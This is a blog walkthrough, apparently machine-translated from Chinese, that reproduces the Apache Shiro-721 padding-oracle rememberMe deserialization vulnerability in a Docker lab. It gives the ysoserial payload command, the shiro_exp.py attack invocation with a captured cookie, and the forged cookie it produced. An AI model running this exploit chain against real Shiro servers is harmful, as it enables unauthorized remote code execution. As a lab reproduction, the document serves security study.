Shiro Historical Vulnerability Recurrence - Shiro-721

Enterprise 2023-07-15 23:28:45 views: null

Article directory

Vulnerability principle

Shiro rememberMe deserialization remote code execution vulnerability

Due to the problem of the rememberMe field encrypted by AES-128-CBC mode in the Apache Shiro cookie, the user can construct a malicious rememberMe field through the attack code generated by Padding Oracle encryption, and re-request the website to perform a deserialization attack, eventually causing any code execution

The rememberMe cookie is encrypted in AES-128-CBC mode and is vulnerable to Padding Oracle attacks. A deserialization attack can be performed by combining a valid rememberMe cookie as a prefix to a Padding Oracle attack, and then crafting the rememberMe.

Tip: After version 1.2.4, shiro has replaced AES-CBC with AES-GCM, and it is no longer possible to traverse keys through Padding Oracle.

Affected version

Apache Shiro <= 1.4.1 (requires a legal login account, based on Padding Oracle attack to achieve the attack)

Reference link: https://www.jianshu.com/p/833582b2f560

feature judgment

Since exploiting the vulnerability requires a legal login account, here we use the account to log in normally to obtain a valid rememberMe cookie, and record the value of this rememberMe

Environment build

Docker basic operations

docker pull vulfocus/shiro-721

docker run -d -p 8080:8080 vulfocus/shiro-721

Visit the shooting range address and build successfully

http://192.168.88.130:8080/login.jsp

Vulnerability recurrence

Use the correct user and password, check rememberMe, use the burp proxy, and get the returned rememberMe value.

If the authentication is successful, the deleteMe cookie will not be set

The deleteMe cookie will be set when the authentication fails

deleteMe's cookie

bVZT3bzgT/0t714w/WmYr3EP081Z0qO7gaUMGC90GK/R019JeYL+64UgucSB8COn6jlzV10THzZP0okwQ/Fs75d2XAvhepUV8RxgSWhFEWQLNq4nXw1ESgbiAQb9KyMd/nwgT9goYuMOERIbNA6Ay5AWRtuLvEaRmSTYPwxampXbnG2JlSXms45L6uqM2ek4X3y6ZSiZM80XbZUyXdOBP+EN8TuRhO+bS8N8jEWaj/uAtNZY8m94m11/SIPk1nBGfGzpcU3WIbT4R3feHaOkCHYLTuLxif1q6rItx5eICS5q8B4qVrTESf2XCFgaGp2FxlZ18AjpTOF4gwQ7cLEM7L49BhvxpAlj4w0GMOuyk27OKdUIh3+RK5qT7Dgp3fGWbEZrqyu6MCAG0TmKY2vKE1peLRNEAuQJapRU/FCVcSfSolxIMHSHb/WzBpcLehOC5Jslb5hekliouggjfNfTV6fSuvz1hLIfix2IiRwmiM/ns3xAVVsBwOc+1SxLqpt2

Use ysoserial tool to generate payload

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/1" >
payload.class

#"touch /tmp/1" 在tmp目录写入1

Use the deleteMe cookie value obtained by burp just now as a prefix, load the Payload, and perform a Padding Oracle attack

Script link: https://github.com/wuppp/shiro_rce_exp

python shiro_exp.py http://192.168.88.130:8080 [rememberMeCookie] payload.class

python2 shiro_exp.py http://192.168.88.130:8080 bVZT3bzgT/0t714w/WmYr3EP081Z0qO7gaUMGC90GK/R019JeYL+64UgucSB8COn6jlzV10THzZP0okwQ/Fs75d2XAvhepUV8RxgSWhFEWQLNq4nXw1ESgbiAQb9KyMd/nwgT9goYuMOERIbNA6Ay5AWRtuLvEaRmSTYPwxampXbnG2JlSXms45L6uqM2ek4X3y6ZSiZM80XbZUyXdOBP+EN8TuRhO+bS8N8jEWaj/uAtNZY8m94m11/SIPk1nBGfGzpcU3WIbT4R3feHaOkCHYLTuLxif1q6rItx5eICS5q8B4qVrTESf2XCFgaGp2FxlZ18AjpTOF4gwQ7cLEM7L49BhvxpAlj4w0GMOuyk27OKdUIh3+RK5qT7Dgp3fGWbEZrqyu6MCAG0TmKY2vKE1peLRNEAuQJapRU/FCVcSfSolxIMHSHb/WzBpcLehOC5Jslb5hekliouggjfNfTV6fSuvz1hLIfix2IiRwmiM/ns3xAVVsBwOc+1SxLqpt2 payload.class

Usage: shiro_exp.py <url> <somecookie value> <payload>

takes a long time in between

The blasting is successful, and the value of rememberMe cookies is returned

6ug1zz4BAzMfEGfqrLBO34ZfOOFO0Ucw/ocfmVCcPBdK2rQmjzPdMczCUTDsYz2M2Fbvq4zYKW4ffu8uBOqWdkyf1RmCM0LdoVLUMqTmqcdxPS0S9noRnrPEtb8UjxyWAXnZQGyEhIF3svbLkcEQIOKk+4ER3rE+6v4pq0JeEELL03FfrMfm8LudHC/FqxDuacnZv1pA2gRJguVe7Y/bSVxqqAli/TT4Cz9i6rbFl6MQSkIsXfa9UZI/wcSgH3CswahR5vF4fgm5Apr7k8hA/DqI8EqqKJQgqp+RuzmYCcMsw5/I4DDr1O7M3Nx16k7AVobuvauJDNC9r2yngVWxzSlk8fBVr6G2Jc+kNRJE1k68EhlHjTAFcV9LDzVK7rVOJmOkK+iJOwxi1T2i8bCV1fPB0bHJ2JifbtKXt1P3aQHdbZ6FbpL+2AbLYekZvwYDeOWrkxoWESRgdV3RwhMmwazgiZ1Pi5jrqhTYYeAdsEwNsmDJvkbsXBgyMmDbwE3E/rFKHEFyQD0bT54CP6UvAwgKH4dlK9fZQwMAL1iOWOxp+G/3U67RBxjzNLZ2UhG3yinc3ay4j1iQQfHh+9csRCNkLcwYwELkc8IW8OqOa1IQ0doQz0U+eEXz8vVWRKB09B263x9KUlxFkjctG/7WAAFTn2kv1kOe/lmWqZOOWbwbkhTGfi/X4rodZ0wbxBChonp7CWGeDDwDOhDWQePZaxgZ0ySEFE56NE/YkHl4l0Y2BlbDcPj7URgl+eAtQae8GZE9q+/UUrdSreH2AsON4E1WDJFzZRTn5yp5fBhJ7MZvWCFRyDISdU5kq5NIboG2VCHoud3zF0Cv5kygVfRrP7qa/83YprxQABqnrMZsxVxrLshK9VfzP1QXQ+copmNdtwZF/4n5p1ry/AYTs1qYYebc0X9l0KA9e9iLej/PMCQdrG8cTiwoBeZ5oxGK4aIc2mEGmH6xU4Y6PCXWda18Ux6LDEF7Zo5baBq4Wedn3+fW0sZAAUY1aPTMjQ+evgornrtU3mt2Zl3W9nor385RUHaOV6DSuw+rFW7zoeIyKVVjWXH7DDq14/EuFdao3lJd3pNkzRI1aeWEdNEyL+eysi8q2wR12pnMZthoiXIENBvDSYwdR/NXUob24TteBoMmC0DH3scFaIO+r2qoRMigg5ZJvuMLcKoDMKWrfTiv/jDIdo/lNwSgmhGSrHFKmpxC2D1P98iCzBU5VrH/AbipzhLKKFo6uczwxwRAauu/ityKgYYqsuHf7MqS+6yNDLoc5iPAD4gZ92+MEeIqq9/NdFy3DrcZ0bNK/FpUAT5T1oAnP3PcaZOseD+9e8JZJavOm+xsqv/0zly92Q3Fk6A9UNtVMXljS2fUWU1If6LTcCFQ26IHIfKIjxqGaB+1gEMeGcvuLBZ4lAaE2/yhRa4kswAAAAAAAAAAAAAAAAAAAAA=

Access the shooting range address and use burp to capture packets, add the rememberMe value blasted above

Go to the shooting range server to see if a file of 1 is created in the /tmp directory

docker exec -it 035 /bin/bash

The exploit was successful!

Guess you like

Origin blog.csdn.net/weixin_44971640/article/details/128550973
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com